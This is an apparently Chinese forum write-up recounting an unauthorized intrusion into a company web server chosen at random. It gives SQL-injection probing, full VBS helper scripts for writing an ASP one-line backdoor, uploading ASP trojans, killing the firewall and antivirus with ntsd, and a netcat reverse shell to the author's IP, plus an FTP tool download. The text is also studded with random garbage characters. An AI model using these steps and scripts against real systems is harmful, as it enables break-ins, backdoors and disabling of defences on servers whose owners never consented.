脚本的巧妙应用

韩冰

作者:haicao [E.S.T] 今天在网上看到一个动画，动画里说那些大公司的安全做的怎么怎么差，所以我便决定找个看看，在GOOGLE随便输入了"集团",搜索到的第一页随便点击就进了一家公司的网站。随便点了一个连接加了一个单引号 http://www.xxx.com.cn/gushi.asp?pid=8&cid=111' , X# X. j2 ], o3 l% i9 L晕，返回错误： Microsoft VBScript 编译器错误 错误 '800a03f6' 9 x9 V5 W7 c. v* Z( H ( b* |% I: j6 m" Q+ s3 F( z2 q) ~缺少 'End' /iisHelp/common/500-100.asp，行242 0 W, q3 C* x0 | Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' ' A' l1 p. y# Z[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。 /inc/artid.inc，行8 返回的信息说明是SQL Server ping www.xxx.com.cn后返回IP：61.XX.XX.68通过IP可以直接访问这个网站，说明是独立的服务器。 我一下来了兴致看来是家有钱的大公司，用NBSI检测了下这个连接,竟然是SA权限的！ # S: H9 M; }; P5 X2 c1 G* U 我用SUPERSCAN扫描了这台主机的开放端口只开放了80及8080端口(都是提供web服务，看来是装了_blank">防火墙，意料之中)。这样的话直接添加用户开3389什么都失去了意义了。只好重新理清头绪。 首先想到的是用ECHO写一个ftp.txt文件然后执行ftp -s:ftp.txt来下载一个nc在NBSI里执行命令反向连接过来就可以得到它的系统权限了，但在用ECHO写文件时又出了问题了，我输入一条ECHO命令竟然执行了四次。如图我输入命令 echo open ftp.eviloctal.com>>e:\xxxweb\app\3.txt(e:\xxxweb为网站根目录)竟然往文件里写入了四次这样的话直接用ftp.txt下载文件肯定没戏。 9 p+ B3 L! ~$ F; Y8 D) i$ x, E5 T # x% n3 k7 s+ U) Q1 q) h* c* H 0 M( z) g9 S' Z+ m9 A3 h1 U! P(特别提示：用NBSI执行命令的时侯最好不要勾选尝试返回结果，因为执行命令会很慢很慢，而用重定向符">>"把命令的执行结果重定向输出到web目录比如dir c:\可以写成dir c:\ >> e:\xxxweb\app\1.txt这样速度很快然后通过浏览器查看命令执行结果浏览http://www.xxx.com.cn/app/1.txt e:\xxxweb为网站的根目录) - ~6 b( d4 G9 u; ^. r. A * ]7 q) q5 F9 M6 G- K如果能把那个一句话的后门(服务端:)写到WEB目录就好办了，但是不管怎么ECHO %也被过滤掉了。在本地执行echo ^的文件，但在NBSI里执行时无论如何生成的文件中%被过滤了。内容变成: , u7 ^4 S3 }4 a& y" y4 W* C( y3 J% p: H <execute request("l")> n2 b9 [- k" f9 D<execute request("l")> <execute request("l")> ) s% P7 Q8 v2 G7 h+ J0 u<execute request("l")> 3 X @& S# `# z1 [2 P" j - w1 u2 f7 T" [ j# S/ o* F! K- l这样的话，就没办法直接写一句话的ASP服务端后门了。(内容为四句原因同上)我想到了先写一个VBS脚本然后把要写的文件内容作为参数传递给VBS脚本去处理生成相应的文件。 / F% b; T4 i* K写文件的脚本writefile.vbs(命令格式为cscript writefile.vbs "要写的字串" 目标文件)内容为： " K% c9 W& C8 @on error resume next:x=1: 3 a: ]" t8 c+ ?, Bstr=replace(Wscript.Arguments(0),"==",vbcrlf): '将==替换回车 " S( x' f9 h3 lstr=replace(str,"**",""""): ‘将**替换为符号" N: _2 I! B$ @: m. dstr=replace(str,"--",chr(38)): ‘将--替换为符号 & 0 @9 B9 x+ K! G7 m: Fstr=replace(str,"@@",chr(37)): '将@@替换符号% * u" T& {( A5 H* l& t# YSet fso = CreateObject("Scripting.FileSystemObject"): " e+ T! g: ^, H7 q+ D ?Set a = fso.CreateTextFile(Wscript.Arguments(1),true): ‘创建文件,文件名为执行时给出的第二个参数 if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if: $ j& U3 a" y3 i; E这个文件得用ECHO命令把它写到服务器上xxx.vbe或xxx.vbs，然后用这个VBS写我们要的文件。(上面中因为像",%,&,回车符 是不能直接作为参数传递给脚本文件的,所以还需要对这些字符进行替换。下面的脚本trans.vbs将完成相反的过程) 简单解释一下：第一条语句是最重要的，容错语句不管后面的程序出了什么错都继续执行。其次是IF语句，为了避免多条语句重复向文件写入同样的内容用了一个标志若x=1才执行写文件，写完马上把x赋值为2。其次可能你会感到奇怪为什么每条语句后加了:，其实是因为我考虑到如果在同一行有多条相同的语句的时侯可以保证程序还能执行。比如: str=replace(Wscript.Arguments(0),"==",vbcrlf):str=replace(Wscript.Arguments(0),"==",vbcrlf): 8 L3 I3 f6 L* s! i若写成str=replace(Wscript.Arguments(0),"==",vbcrlf) / j S- l8 x4 V* V) M" v则一行显示多条相同语句时变成 # k7 o! a' d6 E- ^" A3 {str=replace(Wscript.Arguments(0),"==",vbcrlf)str=replace(Wscript.Arguments(0),"==",vbcrlf) 这样程序便不能正常执行了。 2 C! v& M3 ~8 v3 ]$ {- r7 J% R",%,&,回车符 是不能直接作为参数传递给脚本文件,容易看出用==代替了回车，用**代替了双引号,用--代替了&，用@@代替了%.在执行写文件得先把我们要写的文件比如转换成writefile.vbs可以接受的格式。用下面的脚本转换trans.vbs(命令格式为cscript trans.vbs 源文件 目标文件)： + a9 l' [; l3 v9 @6 Hon error resume next * \3 a2 i5 r) |3 aif Wscript.Arguments.count<>2 then wscript.echo "参数有误啦 格式为:cscript trans.vbs 源文件 目标文件" wscript.quit end if Set fso=CreateObject("Scripting.FileSystemObject") Set a=fso.openTextFile(Wscript.Arguments(0)) 1 |' Y) f a' E. y& D Q" j( g2 B5 ustr=a.readall & g! M: H7 O" j. y" p+ D6 qstr=replace(str,"""","**") '把双引号替换成** * ^2 Y* ]+ y5 p4 N) C9 istr=replace(str,vbcrlf,"==") '把回车替换成== 8 R# t6 N3 i8 b6 G* O' Ostr=replace(str,"&","--") '把&号替换成-- str=replace(str,"%","@@") '把%替换成@@ wscript.echo str / [& G5 N2 E* t* X5 `Set a=fso.CreateTextFile(Wscript.Arguments(1), True) a.Write(str) 在本地执行cscript trans.vbs one.txt onetrans.txt 其中one.txt为我们的一句话后门内容为： 转换后内容存在onetrans.txt中内容变成转换后的：<@@execute request(**l**)@@>保存在文件onetrans.txt中。 . W( v, m- D8 C* t! U% T2 T6 fwritefile.vbs的ECHO代码为： echo on error resume next:x=1:>>writefile.vbe 1 Y5 P/ S/ L% U' u& j& Cecho str=replace(Wscript.Arguments(0),"==",vbcrlf):>>writefile.vbe 8 y+ f2 j$ O1 t9 @% E) {$ X0 n: Mecho str=replace(str,"**",""""):>>writefile.vbe & h' K7 B5 D& S/ I+ uecho str=replace(str,"--",chr(38)):>>writefile.vbe 0 T" o7 Q" h* @: { N/ y, [8 mecho str=replace(str,"@@",chr(37)):>>writefile.vbe echo Set fso = CreateObject("Scripting.FileSystemObject"):>>writefile.vbe echo Set a = fso.CreateTextFile(Wscript.Arguments(1),true):>>writefile.vbe ! j y, E1 N' Z( G7 o zecho if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:>>writefile.vbe $ o3 s- |" C. W& k# h4 A) t把上面的命令一句句拿到NBSI的NB Commander 命令执行器上执行一下就在对方的系统目录下写进了一个文件writefile.vbe,接着就可以把一句话的服务器的后门写到对方WEB目录下了！命令为： 7 i- F3 [8 h% @( Scscript writefile.vbe "<@@execute request(**l**)@@>" d:\web\app\1.asp (注意当传递给脚本的参数中含空格时一定得用两个双引号括起来！) - o1 U, w! X4 N2 p) [4 m相应的地址为：http://www.xxx.com.cn/app/1.asp / ]7 w0 @4 ]* v5 P+ Z/ q& S把post.htm的form action指向这个地址我们就可以在本地把我们的木马上传到服务器上了！如图： 执行post.htm在下面的文本框中粘贴一下我们用来保存文件的ASP木马。并点击upload当成功转向EST论坛时说明ASP木马上传成功了！ 我很顺利的把保存文件的木马上传到了服务器上文件名为advv.asp.如图： 我把这个木马加了验证所以必须得通过这个url才能顺利访问: 5 Y. I, y2 s6 S e9 rhttp://www.xxx.com.cn/app/advv.asp?id=haicao （当未加参数id=haicao时显示空页面）

韩冰

实现密码验证的功能很简单只要在ASP文件头部加上以下语句就可以了其中的haicao为密码可以自已修改。 用保存文件木马(这里上传后文件为advv.asp)上传cmd.asp(同样加了密码验证haicao) 上传了列举进程的脚本,文件名保存为list2.vbe： $ A% n8 Q8 n" ?# J" Jwscript.echo "PID ProcessName" for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ '<-这边有个空格 # @6 M$ o( v7 @$ }2 G' `) ^wscript.echo ps.handle&vbtab&ps.name next 我用writefile.vbe把这个脚本直接写在system32目录(在NBSI中执行。这样运行脚本方便不用指明脚本在所在路径)命令如下： cscript writefile.vbe "wscript.echo **PID ProcessName**==for each ps in getobject(**winmgmts:\\.\root\cimv2:win32_process**).instances_ ==wscript.echo ps.handle--vbtab--ps.name==next" list2.vbe (详细使用方法同上) 2 I. Y) H/ R* M+ l. I; h列举的进程列表如下：(我直接在cmd.asp下运行cscript list.vbe，也可以在NBSI里运行cscript list.vbe >>e:\xxxweb\app\1.txt然后通过IE查看文件1.txt) 2 q* w. g9 p7 p8 `; ~ l4 SMicrosoft (R) Windows Script Host Version 5.6 版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。 ) @0 o4 |8 e2 q2 p1 X' M 8 y& e$ @+ h% j2 UPID ProcessName 0 System Idle Process 8 System 1 v" j5 i' m3 w5 j6 S; ]$ E160 SMSS.EXE 184 CSRSS.EXE 6 G% O' l* ^3 @7 T+ Q0 [# q204 WINLOGON.EXE T, h5 k! ~% o) q232 SERVICES.EXE 244 LSASS.EXE + k6 W; I0 p0 V7 ]6 x448 svchost.exe 6 |! o, I% e6 N) V5 u7 X480 spoolsv.exe B$ K1 m% ~' n9 K+ O508 msdtc.exe / h7 B% U% h7 _; U9 ^( V* e5 A4 @0 g624 svchost.exe 2 r) g2 O D' V" o/ v, r652 LLSSRV.EXE 4 w7 F% r2 T. d: s/ k7 m692 sqlservr.exe 744 regsvc.exe 780 mstask.exe : _& u% |1 B$ r* h" Y848 WinMgmt.exe # X: \. _6 S0 M! q/ Y900 svchost.exe / S/ x' t% l& @0 p) ^$ v# F3 i920 dfssvc.exe / B' Q3 l, p+ b# t+ h( |936 inetinfo.exe 9 U& |" E$ H/ }0 g$ C' R; E952 mssearch.exe 1256 DLLHOST.EXE 1296 DLLHOST.EXE 2 F% R+ k4 g: a1648 svchost.exe $ l% [4 ]& T2 Y968 explorer.exe 1784 Rfw.exe <-瑞星的网络_blank">防火墙 ( b' r0 k: J5 e8 e. |1628 internat.exe 1612 sqlmangr.exe 1944 CCenter.exe 1572 RavTimer.exe 1260 Rav.exe ; p7 w. e( h7 C& [1652 RsAgent.exe ; m" d" s1 }6 C% u, r. V996 agentsvr.exe 2048 sqlagent.exe / H6 D' `+ v% ] `# r* f1172 CMD.EXE ) A2 r q$ L' m' n2024 cscript.exe 第一列为进程ID第二列为进程名。 开启的服务如下：(命令为net start,执行方法同上) 已经启动以下 Windows 2000 服务: * \! Z; ]4 g% S8 l Alerter 4 R2 J3 f" h/ I6 b) s Automatic Updates : S2 x( Q X. }' y2 R1 v COM+ Event System Computer Browser DHCP Client Distributed File System % z' J3 V4 u( Y" D6 _( { Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client 1 Z9 u. `0 u; q) e ^+ W/ d6 W; J Event Log 3 f. Y z ?8 P( H IIS Admin Service 5 O/ p6 G3 q; _" ~ IPSEC Policy Agent License Logging Service # _1 p/ F; P) U# x2 X* M9 f Logical Disk Manager Messenger - J$ t" A8 J- m6 j Microsoft Search 1 d8 m9 t6 k/ R+ ? MSSQLSERVER 2 }0 @# W( e: K Network Connections NT LM Security Support Provider Plug and Play : H1 k5 N" w( X) [: g, X Print Spooler 9 `$ n. P Z% h7 d$ Q2 p6 a Protected Storage Remote Access Connection Manager ' p/ P2 c1 V8 q- G/ v2 s; s Remote Procedure Call (RPC) 5 f! ? d7 ~. @% K( h, i. g( l Remote Registry Service ! j' \ e8 ?+ L( ?- G- {' R5 V Removable Storage Rising Process Communication Center RunAs Service Security Accounts Manager Server Site Server ILS Service 8 P( d* r: Y6 ? SQLSERVERAGENT 1 c, u! d/ X# j3 } System Event Notification * D5 o* w& x; f4 ]% }# V {9 u Task Scheduler TCP/IP NetBIOS Helper Service 6 k- C- P4 s% D Telephony 9 n! m' z+ i7 z& x5 h Windows Management Instrumentation ) c1 K' H/ E0 [* y+ F' T8 | Windows Management Instrumentation Driver Extensions % Y' U0 p% ` @; ~ Workstation : F7 g7 W% x1 m" j+ X World Wide Web Publishing Service \2 x) G9 i7 I / r1 l8 b4 K( o3 r! U2 N Z& v命令成功完成。 我先后在NBSI里执行了ntsd命令关掉瑞星网络_blank">防火墙及瑞星杀毒软件(命令格式为ntsd -c q -p PID). ) p2 Q o/ }# F; V关掉网络_blank">防火墙后,依然只能连到原先可以访问的80及8080(都是web服务。基本上是硬件_blank">防火墙或者是过滤了tcp端口)还上传了海洋顶端(用advv.asp上传)，用海洋顶端上传了NC.EXE，先在本机nc -vv -l -p 80监听后，然后在NBSI里执行反向连接的命令（注：那为什么要在NBSI而不直接在cmd.asp里执行反向连接呢，相信你已经想到了在NBSI里反向过来的是administrator权限而cmd.asp里执行反向命令连接过来的却只有iusr权限,呵呵。 1 T. F, T' w, v H! T6 F0 ^）nc 222.75.88.181 -r 80 -e cmd.exe其中222.75.88.181是我的IP顺利的得到了对方的shell如图: - L! s$ K; s% n& K0 \ " Z2 W0 [* c4 j: u! G之后我尝试了几个其它的端口依然可以正常的反向连接过来，到此我没再深入下去了，怕怕。 " p/ V+ w' r1 e' S' Q后记:在上传一句话的服务端ASP后门之前我先用writefile.vbe写了ftp.txt的文件进行下载,但是失败了下载完文件的大小为0字节,开始没仔细看就尝试反向连接，失败了,很郁闷(:后来才发现是FTP下载失败.灵活的应用vbs脚本将会使成功入侵顺利得多,呵呵.这次成功的入侵有一些偶然，因为是独立的服务器权限设置全部是默认的设置，省了不少麻烦。如果是虚拟主机SQL也不可能是SA权限的。这次的入侵有点偶然，但灵活的脚本应用也是这次成功的关键！

文章相关脚本下载：http://haicao.1ki.cn/down/otherscript.rar